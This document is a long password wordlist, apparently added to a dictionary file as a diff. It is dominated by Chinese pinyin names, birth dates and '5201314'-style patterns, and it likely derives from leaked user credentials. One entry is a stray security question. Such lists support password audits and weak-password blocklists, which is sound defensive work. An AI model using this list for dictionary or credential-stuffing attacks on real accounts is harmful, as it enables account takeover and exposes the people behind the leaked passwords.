+198573 +198575 +aiqing36ji +zhouyi123 +heying520 +19901203 +lyh123456 +cj1314520 +801015 +mnbvcxz1 +jiang1314520 +mayday520 +happy1991 +11221122 +jing1989 +1983214 +198315 +123456gh +a7788250 +yj1314520 +lang123456 +As123456 +zhangyue123 +1990128 +wangqing +6y7u8i9o0p +sanmao520 +19850206 +wangting +luo520 +811222 +wode2009 +124124 +820815 +qaz112233 +wang7758 +zhu12345 +810723 +811029 +880722 +159753aa +821119 +811122 +123123ww +zhou5460 +871006 +nokia3310 +19811221 +dabao123 +5205201314 +19851215a +loveme520 +830616 +198929 +222666 +zxt123456 +19870630 +woailuo1 +wangjuan520 +19850726 +19850721 +5418854188 +qaz123321 +19880228 +liu1991 +liu1992 +901217 +kaka123 +191919 +Aini1314 +123liu321 +liufan123 +shuai1992 +1985106 +820123 +hong1984 +168000 +19890805 +woheni1314 +147258369qq +19880112 +19841108 +qawsed +198283 +zhuzhu1314 +success +a19891121 +qqqq123456 +jian520 +kelly123 +remember +LOVE1314 +21forever +gaopeng123 +xiaojia520 +tw5201314 +19491001a +xiaochen +199132 +7shang8xia +zhoubin123 +19860909 +talent +huangxin +890625 +o00o00oo +a299792458 +900511 +wingzero0 +kf123456 +123456789g +1234567891 +wzh5201314 +19901214 +shanghai1 +19850210 +cheng1993 +king1999 +wowowo123 +Qa123456 +840816 +987412365 +19880715 +1234512345 +19860211 +a23456 +123456fj +224466 +272727 +426426 +860919 +860913 +zhou1230 +huanglei +kiss5201314 +ooooo00000 +1988114 +19880615 +edward +baobao1989 +860716 +198608 +feng1983 +926926 +19900826 +198707 +tiancai1 +xuchao123 +19890127 +s000000 +821120 +821122 +159123 +love1225 +iverson03 +haitao123 +gaofei123 +xxx520 +zhangzhen123 +12345zxcv +198955 +810811 +caojing520 +19890621 +liqiang520 +xiaoyao007 +jiaxin +198288 +zhuxian123 +wjx123456 +yahoo123 +3e4r5t6y +jiangwei1 +19860625 +jie520 +rongrong +huang1002 +ilove1983 +881103 +luowei520 +210210 +1989yang +5211314aa +881004 +woaini1210 +7758521c +li010203 +1314125 +19831101 +19840807 +19840801 +asd1314 +800123 +happy2012 +19870228 +super007 +wangxi123 +198684 +ASDF1234 +198291 +123apple +yangxiao +lulu1234 +820113 +dong1989 +wangjing12 +19840128 +19840127 +1987826 +xiaoxue521 +zaq12wsxcde3 +xiaxia123 +850102 +qaz963 +900526 +19911019 +liuhuan520 +880129 +159369 +yangxue123 +19901230 +wqs123456 +ASD123456 +820512 +zxj123456 +huwen123 +19831130 +ning1989 +781001 +19901221 +aaron1120 +zxcasd +nimabi +zhende21 +840828 +xiaoxin11 +820215 +bendan1989 +861214 +880530 +asd456789 +wanmei1314 +198213 +limeng +llllll +xiaowei1989 +zhangqing1 +8802667 +901005 +jiangshan +ry123456 +wokao520 +511511 +wangzheng +110101 +raul1985 +menghuan2 +qq147258369 +www123321 +woshizhu88 +19860525 +890112 +lihui520 +liuhuan123 +19880528 +198878 +5201314jay +xiaohua +123123yy +1988622 +chenzhen +870829 +a19891229 +900224 +19910527 +19890611 +19890615 +love1010 +sj1314520 +123qaz456 +1990714 +nothing +l2255474 +sxy123456 +19860710 +19860714 +840927 +19890825 +asd789 +861220 +123456ABC +830117 +chen1120 +OOOooo000 +liu5211314 +200810 +xinyue123 +weijie123 +weiyi123 +123456wc +19811025 +521531 +850618 +mm3344520 +nokia5320 +123555 +5201314j +5201314k +5201314b +19901118 +ri4daohao +1q2a3z +860513 +198401 +xxl5201314 +shouhu1314 +871210 +wudan123 +880127 +zhang100 +725527 +880227 +19830219 +chinese +abc11111 +19870411 +19870419 +yl5201314 +hanxiao +198808 +houhou123 +1q2q3q +19830415 +820228 +bendan521 +200200 +19870731 +1988wang +861203 +198229 +lijian521 +198838 +870621 +870628 +liuquan123 +xiaoxu520 +zhanghe123 +860815 +wy123456789 +198361 +hh123123 +16881688 +yangyi +www888 +as12345 +tangtang520 +fuhao123 +19831118 +qaz789456 +1314520jj +830326 +19860228 +19900906 +19900902 +456789qq +19890301 +wei5211314 +gw123456 +871030 +870220 +19900805 +zhangxin1 +58420184 +maomi520 +wujian +gaofei521 +19910422 +daohao74 +226688 +123456789www +kong123 +songjian +810912 +love1106 +baobei21 +chenxi +sherry4869 +656565 +zhang1213 +yangwen520 +kangta27 +19860209 +y31415926 +1989829 +woziji123 +19890325 +chen1210 +jianghao123 +19820707 +woainiya +1234abcde +huan520 +jian1314 +hao123hao +zxc111 +shanghai520 +19820909 +congcong +zx110110 +900827 +jiang1982 +jiang1981 +44444444 +ps5201314 +19821230 +5201314zxc +820613 +qazxc123 +AAAaaa111 +wwwhao123com +woshiren +19791010 +jiao1988 +520angel +zy159357 +19880810 +a131415 +shijian123 +qw7758258 +1986716 +1314520zx +lingfeng +shanghai00 +987654abc +a19881121 +hulei1989 +5201314hh +xiaogang520 +1314520yu +123asd789 +198737 +cjf123456 +19890417 +1314521x +wangyang521 +870612 +870615 +ming1990 +198587 +caonima78 +851030 +sunjian520 +woaicc1314 +qq131421 +870418 +xu666666 +aiyuan1314 +851115 +z123654 +aiqin1314 +zjl5201314 +k1234567 +xiaosa123 +1986419 +19890315 +198634 +5201314yl +880802 +870212 +shenhua +850811 +850813 +850818 +peng2008 +whyme310 +521666 +jiajia88 +woaini5211 +shan123456 +bingbing521 +zhang55555 +lishan123 +jianfeng123 +xiaoqian123 +1020300 +bobo123456 +198894 +19860410 +19860417 +850311 +123456jing +jaychou +131411 +19910124 +zz1314520 +301415 +1991118 +19870414 +19870418 +19910101 +philips +831005 +selina521 +zhang11 +19831030 +woaiwojia1988 +c000000 +880622 +831108 +198758 +198751 +wyc123456 +qaz789 +840118 +444555 +asdf654321 +family521 +wangqi520 +123456e +zhaoxu123 +123456jh +19891229 +19841102 +19821227 +810224 +19850920 +19850924 +zhanghao12 +880922 +a1122334 +wufan123 +198506 +870121 +100200aaa +900118 +860218 +19880325 +123456sj +880103 +880101 +wang520520 +19880920 +123gogogo +majie123 +880205 +zyb123456 +w11111 +ABCDE12345 +19890412 +198703 +19831211 +880406 +huangjing +851207 +jc123456 +19870711 +abc123ABC +880509 +sheng1991 +qwe000000 +5201314lin +19881108 +zhangshu123 +890303 +851104 +000999 +19881007 +hao1314520 +aaa333 +791127 +19860204 +shmily1023 +19890320 +mimi1234 +zxf123456 +870201 +qq520530 +woaini67 +qiujian123 +nishizhu11 +angel123456 +830907 +xb5201314 +asd789456 +262626 +zxc321zxc +19910410 +allen1984 +19890720 +321ewqdsa +830824 +liukai +woainima1314 +xiaomi123 +1qaz2wsxE +223322 +791225 +19880726 +a1234561 +1234567qwe +19840312 +19840310 +bnm123 +men123456 +zhangxi123 +123456zb +wujing520 +xujun520 +ms123456 +19860724 +chris310 +qq1234qq +mx123456 +654321q +qin5201314 +19831005 +zhujie520 +19831105 +19831103 +516688 +q321321 +wang123321 +880718 +831212 +831210 +chenyu521 +19860825 +19841113 +19841111 +admin1986 +qiqi521 +1986925 +ying520 +880912 +132333 +19850815 +xiang1986 +19821014 +lsn123456 +qazxsw12 +901120 +1986chen +wxm123456 +dai123456 +901223 +860227 +19880312 +lkj5201314 +liuyu521 +19870322 +19870326 +liubing123 +19870527 +chenli +wangmeng123 +880418 +jianghui +maomao00 +bb850726 +guigui123 +zhende520 +1987923 +1987929 +1987928 +19870626a +123asdf456 +851013 +000888 +a19891013 +qqq111111 +890418 +890419 +quan123 +19860215 +longlong123 +1987626 +shanji123 +eminem +lijuan520 +0054444944 +890612 +panzer123 +xiaoqing123 +830911 +830914 +3345678 +lovemm1314 +jccg2003 +mickey123 +xiaowei1 +19840209 +112000 +tian1234 +10011001 +huanxiang +123zxcvb +19890912 +liyang1991 +19921029 +qq1212 +justdoit +wang1023 +czj123456 +a521314 +hello520 +198653 +liyue123 +880229 +19831017 +19881002 +52xinxin +majie520 +198731 +198735 +871122 +820913 +cc000000 +r123456789 +19911214 +19891108 +1314521z +870925 +811103 +520131400 +zheng1984 +love1993 +ws111111 +zyx123456 +19850905 +king2006 +sammi819 +810312 +shenyang +1990525 +1986127 +19830822 +1314521yy +lyc840310 +li258258 +294753618 +a19881012 +ch3ch2cooh +19870210 +417417 +lucifer13 +771120 +5484b9be +bin5201314 +chengang +abcd5201314 +jiahao123 +19811127 +19910210 +19910214 +122334 +870328 +870326 +870327 +1987611 +zhangkai1 +a10101010 +890608 +19860328 +19860323 +duan1989 +mnbvcxz +198545 +198541 +198549 +lucky520 +198784 +19880409 +1475369 +1314520520 +zhangye +loveming1314 +wzj123456 +winter123 +19871203 +zou123456 +wodeai +19840215 +19840212 +wq1234 +14159265 +ab123123 +liuxin520 +19871005 +1q2w1q2w +123456xl +19850415 +star1314 +badboy123 +19911227 +a34416912 +admin1 +123456789jj +yuanyuan1 +123123321a +811210 +cx123123 +ccc123456 +taiyang123 +880614 +880611 +830126 +meimei123 +zhouli123 +lixing123 +871112 +871113 +yang1230 +woaini89 +yin5201314 +123z123 +811012 +19880518 +19880514 +19880516 +ll123456789 +8175125 +1989421 +tongtong123 +zaijian123 +zheng1993 +ming123456 +cc520520 +870812 +870814 +woshishen0 +811125 +asdasd12 +19900610 +891230 +801203 +lzm123456 +198936 +shen1986 +bb5211314 +19870609 +garnett5 +19850717 +821202 +wxf123456 +19870105 +chinese1 +901203 +yumen520 +leslie0912 +yuanyuan1314 +1985923 +kuang520 +asd1230123 +1987228 +19870301 +19900212 +liujun110 +q123654 +123456zll +19890814 +123as123 +g7758521 +520huang +huhao123 +123456lxy +jianqiang +ss110110 +roger123 +kuaile521 +102938 +wahy1314 +19910108 +124578963 +890513 +890516 +yang1994 +zhaoxin +lichen521 +pang123456 +889988 +zhangrui123 +198377 +yjt123456 +123456asdfgh +yes123 +123123zzz +huanhuan521 +413026 +xiaowu +880417 +1234uiop +qpzm7913 +333999 +woaitt1314 +19861107 +13572468 +139139 +840809 +198851 +801010 +juventus +qwert54321 +aaabbb123 +780828 +zz123654 +820311 +860824 +1988321 +123456789xyz +song1314 +19850403 +19880104 +19860412 +19911212 +1990126 +yuhui520 +678678 +arron1120 +1989210 +198674 +fuck123 +lover1314 +841227 +860423 +19880402 +871105 +xiaoxi123 +745839 +mnbvcxz321 +hanhan +880820 +880821 +a1b2c3d4f5 +liting123 +beckham723 +19811226 +19830325 +891003 +zhubo123 +mnb123 +19850826 +891102 +19830908 +shang1314 +19890104 +19900302 +821231 +woshini8 +19860530 +19880223 +19880220 +828828 +baixue123 +wushuang +841030 +huyang520 +1987210 +19870319 +feng12345 +19900209 +19900208 +19900202 +19900201 +andy1987 +wang1221 +19890801 +256256 +showmethe +147258as +shevchenko +616161 +198199 +hzh123456 +waws1314 +sufei123 +19840913 +5261314 +babamama +198795 +88888888q +adsl123 +tang1984 +qq74108520 +xiao1982 +OO00OO00 +19811006 +19911123 +852369 +123456zzx +19860804 +19860809 +521weiwei +123579 +19860903 +820421 +friend123 +buzhidao00 +ting520 +a12341234 +1986122 +nokia6600 +tang5201314 +w789456123 +19801010 +linjian520 +123456789t +jp123456 +781111 +ping123 +qwe456123 +peng520 +801001 +1990411 +19840912 +820203 +198207 +seven7 +lihua520 +820307 +820303 +weiliang123 +flying +zhou1314 +123456xie +74511940 +liu000000 +a13579 +duoduo +860914 +1983101 +yujian123 +mu123456 +19850312 +19850310 +19881021a +19880616 +liwei110 +12111211 +1314520dd +362514 +860712 +811230 +198604 +871014 +871019 +19900821 +1988815 +yzx123456 +820924 +820921 +820929 +wang1314521 +19870814 +liuchao521 +shinhwa +123zxc456 +hz5201314 +love1127 +friend1314 +xiong1991 +gaochao123 +7758258z +19890625 +19900118 +1990518 +821226 +11235813a +881205 +19850623 +820523 +shmily746459 +w123w123 +ky123456 +198599 +jingling +5211314ai +Admin123 +litao520 +nicaicai123 +198188 +qq11111 +qw123000 +921921 +liu110110 +zaq123wsx +liyun123 +yaoyao1314 +love2007 +haixiao123 +198382 +aa110120 +longlong520 +820119 +94202zhe0 +5201314mei +19840123 +1987824 +19911010 +1987723 +libiao123 +wudi123 +19861003 +liubin521 +19890806 +weiwei1982 +weiwei1989 +880814 +lihao1986 +198433 +198432 +rocket123 +xu123123 +630630 +1985916 +jiayou2012 +000127 +8910jqka +o00000 +dongdong11 +19820504 +2597758a +19890327 +1989613 +bao1314 +19901226 +yu123321 +ljj5201314 +king1983 +19870426 +7788414a +668866 +521liang +198833 +123ewqasd +sorry123 +7758258ok +19870725 +wangyun520 +19880627 +2000abcd +sd111111 +liwei1989 +19890504 +wangwei1989 +198012 +a19910106 +sd123321 +forever99 +wjy5201314 +wang112233 +19880621 +52yu1314 +aishuang1314 +830310 +duwei123 +19920115 +lufei123 +860707 +yuyan123 +13579a +wang1124 +lipeng521 +zhudi123 +521886 +19840923 +apple1989 +lg5201314 +yangchao +1988921 +gong1234 +19880522 +198876 +zhoujie1 +zwj123456 +623623 +a19900204 +yanfei123 +870824 +liu123456789 +ysy5201314 +19900620 +1314521mm +198941 +daisy123 +wj7758521 +19860512 +850211 +19830815 +1314520jia +5201314rui +shiwei123 +xiaoyun520 +19860712 +xiatian123 +19890821 +19890828 +123151 +cz5201314 +1987113 +870609 +yan123456789 +yjj123456 +810228 +1qazxcvbnm +19860119 +198697 +lichao521 +asd520asd +791026 +200811 +woshizhu8 +yueding1314 +520feifei +676869 +o000000 +199114 +121121aa +19911108 +1988love +890314 +19860823 +juan520 +aaa520520 +zhangqi1 +mm654321 +iloveyou5 +wangyang0 +genius520 +as102030 +ak47m16 +19850724 +159456 +781015 +kamenashi223 +19870413 +860118 +19900725 +5201314gq +1986222 +wangyi +19890522 +1988626 +malong123 +li1992 +791016 +861207 +880520 +198225 +yuxin520 +870623 +wazz1314 +yan12345 +ruan1984 +123456fan +liuming +sakura520 +1314520ww +521333 +860618 +19890928 +123qq456 +123456yin +xiaoyuer +5201314xu +a121314 +850820 +bin123 +chenjie1 +19900807 +wwww1234 +liuqian123 +19890203 +yangfan520 +1989523 +xiaotao123 +841116 +841113 +810710 +woaini5200 +789456a +h111111 +wang1025 +v7cbgu74 +liuliang123 +kong1234 +123456789wo +q1q2q3q4q5 +zaijian88 +chinese123 +19890704 +xiaoxiao88 +900210 +900211 +jiangyang +198974 +19860408 +lin1989 +cjx123456 +miaomiao521 +198494 +19860205 +890324 +163163 +zhangchen123 +19860601 +buzhidao12 +huang1024 +www12315 +19870721 +wyl123456 +gaoshan123 +19860702 +19860709 +790218 +zl000000 +waxx1314 +52edison +19890329 +beibei1314 +19921112 +zsq123456 +hexiang123 +qiang1314 +milan520 +19840921 +19860104 +zhouyun520 +liangzi123 +zhangmin123 +900120 +dandan1314 +1982516 +900824 +520518 +wobuaini520 +feiji123 +lai123 +qin1314520 +19911111 +19911116 +qiao123 +820611 +lining521 +198734 +a7788945 +batistuta +yuan1992 +19901107 +lulu521 +820419 +fh123456 +ABCD123456 +yn5201314 +xiao1213 +laoda520 +1988525 +1989715 +198534 +19870215 +jiushi21 +yiersan123 +yingzi521 +xie5201314 +850727 +1986112 +098765 +880706 +mimawei0 +iloveyou86 +qpalzm123 +xixi123 +z112233 +19870706 +yangming1 +aaa00000 +52tt1314 +880514 +880515 +880517 +19890413 +19890418 +1990210 +1314520.. +1212121a +liujian521 +liujian520 +woaiwo525 +xu7758521 +19830606 +860923 +860921 +860920 +860924 +sea123 +sunwei +aptx4896 +qq131420 +870412 +1988128 +1988125 +890514 +19860717 +198638 +199028 +870215 +zhangxiao +791025 +19830121 +ying1982 +1986612 +19911206 +wuyue123 +bingbing520 +123456hw +810628 +wyp123456 +woaini1994 +qiong520 +810923 +891022 +peter007 +zxc147258 +5358979 +1988118 +zxf123 +qunimade8 +19910705 +h31415926 +zcm123456 +19820610 +12as12as +shadow520 +long1984 +1qazxc +831008 +iloveyou13 +880629 +19841219 +dk123456 +weiyi1314 +12345678asd +19841104 +19821225 +z123321z +821031 +19841005 +fengzi520 +yuan1982 +aa123123aa +xuxin123 +tvxq521 +wang2xiao +870126 +870120 +919919 +zhangkai123 +apple000 +yangjing123 +19880320 +19880329 +123456sd +123456sz +ts123456 +a1231231 +198520 +962464woaini +jiushi2ni +1q2q3q4q +1989zhang +bobo1234 +19880922 +worini123 +880201 +19880418 +850228 +zx1314521 +19870512 +yy520520 +aa159753 +huwei520 +880309 +baba520 +19831219 +19831215 +19900703 +102600 +516518 +zq000000 +851201 +liuxu520 +gaofeng123 +qq123123123 +870602 +woaini1314. +xiaoyu1991 +ff520520 +xiaodan123 +fifa2003 +851005 +a19891021 +a19891025 +5handsome +lyy5201314 +851101 +19881009 +19890903 +890729 +890724 +890721 +880512 +19900920 +19900929 +ld5201314 +199019 +cheng1984 +790803 +870202 +shiwen123 +123456789qqq +wang8dan +19881207 +5271314 +xzy123456 +woaini66 +liuyue123 +789qq789 +licong123 +tiantian2 +19890811 +bao5201314 +zy1234 +19890726 +q321321321 +chao123456 +xuanxuan +xiaoxue +lzx123 +shmily77 +19841211 +19841214 +luojun123 +198865 +1q2w3e4 +huangjie +zheng1234 +159263 +liushuang +123123cc +123456zt +1314520abcd +wang1206 +19860720 +zhang1120 +jay790118 +tracy123 +100200zz +love1314521 +12241224 +198642 +198643 +199095 +19831004 +820822 +820824 +kangkang520 +19921216 +998899 +198745 +234567 +gggggg +19831106 +woainimama +zhangbo1991 +henni1314 +19821026 +19891117 +880710 +880714 +y000000 +1zxcvbnm +123321123a +kissyou1 +zhong168 +kiki1982 +asdasd123123 +7755188 +11woaini +801226 +19901121 +19901126 +sudan123 +why123 +198478 +a8828736 +meng1985 +believe +860222 +19880318 +19900517 +880211 +880216 +woaiwolaopo +aiqian1314 +shan123 +1986216 +liliang +880416 +122400 +shao12345 +woaibama1314 +wangyi88 +11a22b33c +zhangbo520 +zhangbo521 +sheng1987 +19910614 +870518 +wasdwasd +7758521zxy +asdasd00 +870312 +19860219 +xiaowei1314 +1987628 +shaojie123 +790815 +lijuan521 +yuanjie123 +1987521 +lc1314520 +19881231 +901222 +xiao2006 +801218 +a19901214 +zw111111 +hellokitty +jinlong520 +521521aa +890209 +jiajia123456 +900320 +123456wys +zxzxzx123 +19891116 +111111aaaaaa +wangjin1 +liuyang110 +112200ss +woshi119 +198989 +shuai110 +linjun123 +song0320 +wayy1314 +168668 +900922 +900923 +890312 +890316 +890315 +wb5201314 +19910726 +zhangyue1 +lijin1989 +811110 +chen123123 +19921028 +zhang5211314 +woaini120 +jianghu +samsung123 +worinima88 +ding1989 +ding1987 +19880721 +zhangyun123 +1989123a +19850126 +19850128 +123111 +880601 +820912 +1314521q +123456ht +123456hl +19841128 +880808 +nana5201314 +19850907 +king2009 +shuaige1 +1986929 +lin1314 +wangjie521 +801212 +336688 +ling5200 +52zxy1314 +901118 +ailaopo521 +xiewei123 +821216 +sw123456789 +wabbmm1314 +19880206 +199210 +qing1986 +19880302 +19830520 +zx123456789 +cheng1983 +wangrui +19900526 +chao1988 +tt521521 +qwe1230 +192837 +qiao5201314 +880321 +guest2236 +zxc123654 +dragon1982 +lsy12345 +liuye123 +870722 +19890420 +19890423 +19890422 +abc123cba +771126 +as7835432 +liuqing123 +tian1984 +liuying521 +fangfang123 +zhen123456 +lzj123456 +891207 +890504 +1987614 +1qaz2wsx3e +10231023 +feng521 +123321ooo +chenjin123 +woainia123 +china111 +1987619 +19860925 +116116 +qiuqiu521 +tianyu123 +790823 +qwe147258 +19860327 +19860326 +woaini911 +asdf12 +linhao123 +cgte0306 +820214 +wangsen123 +woaini10000 +wc123123 +jiao1234 +zhangxin520 +tiantang +yu102030 +131412 +301301 +wukai123 +liu201314 +dafei123 +lilong521 +lilong520 +hudie123 +fantasy1 +zmy123456 +yanlei1986 +wenjing123 +775821 +wangdi123 +121212qq +liang5201314 +zhang1203 +5201314cx +tiancai945 +12345liu +lidong +shan1989 +19901031 +long1314520 +198898 +12ab34cd +yangbin +19840210 +meng1986 +gameboy +liuxin521 +820328 +870627 +wangjia +871221 +900930 +shaohua520 +mingtian +198326 +chenjing123 +19850413 +19880111 +liyuchun520 +791001 +aa411411 +7758258asd +xulei520 +19860610 +liao1985 +ding1991 +ding1990 +majian123 +811211 +880720 +chenfei123 +198664 +asdfghjk +741123 +xujing520 +dh5201314 +880613 +830122 +198720 +871110 +19831121 +19870830 +811016 +811015 +811019 +1988zhang +woailaopo123 +821104 +sunchao +kevin1984 +yulei520 +w12301230 +zhangwen123 +870813 +19850911 +19850918 +qinger123 +1988716 +123400 +830629 +w2525775 +891112 +aassdd11 +19870608 +901108 +microsoft1 +780517 +19850711 +5201314ily +19920604 +880217 +541888 +xxx000 +xuan520 +kaka123456 +qazwsx789 +wx000000 +k4hvdq9tj9 +zhangchi1 +xiaokai521 +harry123 +123456pk +881129 +sa13261052 +asd963852 +19870302 +19900215 +198801 +zhangjun1 +abcd1314 +wang1212 +19890816 +minmin521 +forever13 +121212aa +chenning +hyq123456 +jin7758521 +xiaolong521 +kobe2481 +woshi1234 +qq34416912 +huangbin +asd1111111 +langzi123 +rabbit123 +521365 +nash13 +zhangyu110 +1w2a3n4g +showmethe1 +xiaoqi1314 +wupeng520 +890715 +lovell1314 +fabregas4 +hong5201314 +a741852 +hero1986 +answer +19840627 +890125 +cengjing521 +567890 +198572 +ln123456 +1986213 +831002 +198841 +xiaole520 +900501 +900503 +ranran520 +asdf5201314 +781022 +121312 +123321li +woaini584 +chinamp3 +fl123456 +19841221 +19841229 +801018 +tommy520 +machi123 +19901001 +19901006 +lxy123 +820315 +820316 +851219 +198313 +198319 +19880109 +19880107 +19880105 +a123457 +19850304 +19850308 +19880605 +jiaojiao1987 +110abc +yutao123 +19850201 +811221 +lijing1314 +19880708 +19880702 +xihuanni520 +nedved11 +841221 +871008 +gr123456 +820812 +820818 +mt123456 +610610 +198718 +841126 +871103 +880726 +880724 +miao1986 +821118 +821115 +811128 +811123 +andy88788 +zhangbin123 +880829 +880826 +lingling521 +5201314584 +000000qwe +swq123456 +sherry123 +aibao1314 +891004 +891005 +891008 +323232 +aiqing520 +109109 +198927 +810827 +shen1991 +19850828 +19850822 +891106 +qwerty12 +19900104 +19900101 +huang159 +801119 +801115 +xufei929 +228228 +19880224 +19870118 +123321qaz +810109 +wy7758521 +820124 +134679a +mm7758258 +chenhua +0000zzzz +19880914 +19870317 +hou123 +19900204 +985211 +wang1226 +missing +001002 +happy2001 +2bea6055 +caonimade1 +xiaoguang +liuyan521 +start123 +fh5201314 +1314520hao +tianxia +831130 +conan4869 +ll7758521 +890224 +woaideren1 +861105 +8008208820dhc +hanjian520 +19811007 +19911125 +zws123456 +891021 +zhoujian123 +crystal1 +19861120a +sf5201314 +19811106 +19910917 +yuyang520 +820728 +china12345 +820429 +qwer1989 +852123 +198424 +lemon520 +3.14159 +123456wj +fei5211314 +zhoujing +china1986 +1990zhang +xiaobei520 +521wang +821117 +wodeairen +123321mm +19901218 +liao1986 +lalala123 +781118 +king1990 +1988518 +liuxiang1 +5757124 +198821 +abc10086 +19901012 +ds7758521 +genius007 +wangzhe +nannan1314 +yangqi521 +900913 +900914 +1990214 +1988616 +woshini11 +19920308 +860915 +31415926x +19880131 +830226 +liuyao61 +840826 +huazi123 +wangtao1987 +1988113 +1988111 +ws13142hh +1985214 +wang1013 +7758521liu +xy1314520 +z123698745 +1234569a +830207 +199054 +199056 +841219 +871013 +aibaobao1314 +wocaoni123 +19880410 +19880416 +830109 +19870819 +19890123 +yujie521 +870919 +810612 +821121 +jing2008 +qazxswedc123 +beijing2009 +891019 +aini1990 +zhang1995 +a1989813 +huanghui +830124 +long1103 +19900115 +huang168 +1985718 +1q2w3e4r5t6y7u +19860528 +lichen123 +748596 +zhou1980 +19900319 +ww5211314 +leilei1987 +wahaha +fang1234 +860212 +liwei1981 +lucky1988 +135798 +7758521y +77585211 +happy12345 +890824 +woaini526 +leehom123 +leon1982 +2925138 +1986825 +19860123 +5201314na +19851222 +198299 +tracy520 +liuhui +520250 +h7415963 +820118 +654654 +123456ml +123456my +zc000000 +1983wang +7890uiop +yang8023 +19811019 +liuyan +forever11 +cyy123456 +19841031 +happy416 +123456zyh +aina1314 +lxf123456 +19911013 +19911018 +19860814 +123zx123 +171819 +1x2x3x4x +pingping520 +liubin520 +kaizi123 +zhaoxin123 +986532 +781206 +820510 +fang1984 +fang1982 +lei123 +wuhao1989 +f123456f +zhw123456 +a12300 +yzy123456 +19880719 +owen1214 +summer1990 +123456789xy +861014 +1988yang +19870425 +www000000 +hujian +1989815 +820219 +820217 +chenming +19870511 +wang201314 +1984wang +zhouxia123 +19920319 +nishishui123 +hello321 +5211314xx +830319 +chenyun123 +tangxu123 +810417 +841207 +19900813 +19900814 +19900818 +19890219 +19890211 +841104 +19870807 +19870808 +778899a +19870607 +ling1988 +nhz150078 +nie123456 +iloveyou1989 +870825 +1234asd +31415927 +abc111 +135781012 +19900622 +102412 +p0o9i8u7y6 +woainia1 +peng1991 +xiaohan123 +as201314 +19890619 +19900123 +love1011 +wanglu520 +song1990 +12315abc +xiaosheng +abcd1988 +abcd1989 +584131421q +111223 +13145201 +881113 +881114 +881119 +chong123 +xiexie +1985123 +jinxin +800523 +woaijia1314 +xxd123456 +889966 +900623 +likang123 +19840814 +xiaoxia +11qqww22 +890812 +800625 +huang1212 +1987115 +zhang1016 +19921120 +198454 +850519 +daohao438 +shilei521 +zzc123456 +a13145210 +2008china +apple1986 +sunjun123 +831227 +xiaoyun123 +870828 +dong1991 +lishuai +zz7758521 +QWE123456 +11112222a +daohaode74 +zeinima123 +yanghao +heyong520 +nintendo +li201314 +860519 +admin001 +iloveyou7 +wudi1234 +ailing1314 +920416 +198403 +seven77 +hk5201314 +min123 +zhou2008 +19880803 +19880805 +zhouyi520 +12152205 +120520 +861104 +19850519 +1988123 +781012 +159357qaz +19880606 +851008 +861009 +qwe111111 +e123456 +19890528 +19890521 +19890524 +19890525 +genius123 +huang518 +111222qq +1988211 +861201 +880522 +880525 +880528 +xiaojian520 +870624 +donggua123 +19890226 +q741852963 +860816 +860812 +52zj1314 +1989127 +jiejie00 +yangyan123 +563214789 +jackson520 +lucky1120 +830526 +longlong1 +as12345678 +shinee520 +0932313520 +19880630 +abc123789 +panjing520 +198121 +19830309 +206206 +tvxq1314 +maomao1991 +789456qq +19900908 +822822 +19890309 +19890305 +19890307 +198629 +chenjia520 +a3867070 +870222 +870227 +19870919 +19870917 +860413 +wangwei007 +czcz7031 +gd19880818 +19890201 +123456bai +123456bao +zhangjie55 +woaill1314 +yefei123 +nishiwei1 +zhaoxin1 +rong1988 +ying1992 +wangpan123 +gao123321 +5203344a +830923 +123nihao +jing1129 +666666aa +zhaojia123 +aixu1314 +yl1314520 +s1314521 +chencheng123 +2525775a +zyc123456 +baobao1981 +xiang1234 +19830310 +810910 +901030 +doufu123 +102400 +asd1122334 +900213 +lijing1987 +xuan1987 +xiong1988 +19890604 +xiaodai123 +811201 +19860505 +850201 +95279527 +198492 +890321 +1234qw +19860607 +19910712 +19901103 +l23456789 +1987320 +198658 +wokao110 +lisong123 +790210 +77889900 +jiang111 +a123b456c789 +qq1234567890 +qq5562565 +yangguo998 +19840926 +19831029 +19831024 +goodluck1314 +chen1018 +19820901 +zz123456zz +xuzheng520 +qwe123QWE +lhh123456 +secret521 +song12345 +abc1314 +luojie123 +lisong +zaqwsx +147258369l +850625 +lq123456789 +19911115 +a753951 +aijun1314 +abcxyz123 +520hangeng +water1988 +800215 +yang520520 +198414 +781225 +19880814 +Song1979 +19850701 +liuwei1983 +52zz1314 +asddsa +198533 +quan123456 +ashen123 +127127 +1988long +jolin521 +xieyi520 +a19890808 +159357ok +a19890907 +1986116 +1986113 +880313 +19831209 +19831201 +1234567s +1234567u +19870403 +19870405 +8879576 +jian1987 +19901202 +xing1991 +19830406 +19870704 +880510 +19890415 +19890410 +1990326 +woai1989 +ming1991 +198589 +shiwei +2994876qwe +123123ji +wl7758521 +19830603 +860925 +860929 +yuting521 +19910221 +122300 +wufeng123 +huangshan1 +wyx123456 +qq12301230 +19900911 +19890319 +a19851220 +5201314yi +qq7777777 +xiaoying123 +19860312 +19860319 +850810 +zzh123 +binbin1990 +qwer1111 +19830125 +19890114 +19890117 +wanan8023 +19840728 +19840726 +xiaoguai521 +810922 +zhulei123 +1986910 +123aaa456 +aaaaa1 +asd321asd321 +123qwaszx +198893 +19860416 +aizai2008 +jack1986 +jack1981 +102030abc +abc147258 +19910606 +ew123456 +tl123456 +yangke520 +19860614 +830630 +ronaldo +wh123456789 +veronica +a1236987 +5201314d +family123 +love88 +fuckyou520 +123456meng +wsx5201314 +friends +1 +weiwei00 +840711 +zhaozhao123 +master +831007 +zhaokai123 +911220 +您父亲的姓名是? +wubai500 +windowsxp +880625 +831105 +198754 +huangfei +1234560z +19831113 +110qq110 +a5211314a +zx112233 +perfect +19841109 +love0204 +19850928 +19850929 +19850922 +199057 +12345w +880929 +880928 +xiaoxiao11 +321321321q +huang111 +liurui520 +870122 +a55555555 +xihuanni1314 +huangkai +1223334444 +19850621 +19850627 +820526 +ly7758521 +19880321 +890630 +bb159357 +sj20051106 +198778 +880204 +grys007 +liang1984 +woaibaobao +910716 +zhenai1314 +840613 +840615 +123456tang +880403 +xiaocao +a159951 +19870715 +19870712 +910515 +cc123321 +861227 +19890405 +19890401 +198241 +lele521 +ming1988 +dapeng123 +870614 +5845213344 +liu55555 +zll123456 +3a75sd17 +sisi520 +zaizai520 +chenyi123 +shiyu1987 +112233zz +xj5211314 +94meimima +huangxin123 +7758521lei +zhang0 +880511 +19900921 +01020304 +19890328 +19890322 +dalong521 +198351 +111qqq111 +jiawei1990 +xiaofei1 +871212 +qazwsx321 +abcd2006 +qaz7410 +xiaohan520 +micheal +19890728 +weijie +198998 +19840519 +19900523 +19860428 +love1015 +love1021 +kaige521 